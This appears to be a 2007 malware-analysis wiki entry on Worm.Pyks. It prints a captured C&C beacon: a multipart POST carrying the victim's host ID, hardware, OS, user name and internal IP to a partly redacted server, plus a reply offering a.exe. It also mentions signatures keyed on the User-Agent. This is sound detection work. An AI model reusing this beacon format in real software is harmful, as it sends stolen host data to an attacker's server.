Worm.Pyks
Sample submitted anonymously, it was being pushed via skype reportedly. Has an unusual C&C mechanism. HTTP based, but pushes data by form posts, not in url variables like we'd normally see. The posts have a very unique UA, the sigs for now are just for that. Hopefully we'll find something else.
Below is a sample of the unusual C&C data push:
POST /ucps.php HTTP/1.1
Host: 67.29.130.xxx
User-Agent: h9tslbw0
Content-type: multipart/form-data; boundary=---------------------------zsTM3KE6QiueEnyt
Content-Length: 1115
Connection: close
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="id"
HOME-KJZCRW7Q7Qxxxxxxxx
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="upt"
60
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="mode"
1
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="version"
2.3.1.0
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="cpu"
2211
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="ram"
256
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="os"
60
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="user"
victim
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="inip"
10.x.x.x
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="log"
#x:\xxxxx\pyks20070415212728#
=@64.22.77.xx@=
-----------------------------zsTM3KE6QiueEnyt--
HTTP/1.0 200 OK
Date: Sun, 15 Apr 2007 20:43:26 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Disposition: attachment; filename="a.exe"
Content-Length: 10
Content-Type: text/plain; charset=utf-8
Connection: close
Gi3V8u7JfH
More detail as we get it.
Related:
--
MattJonkman - 15 Apr 2007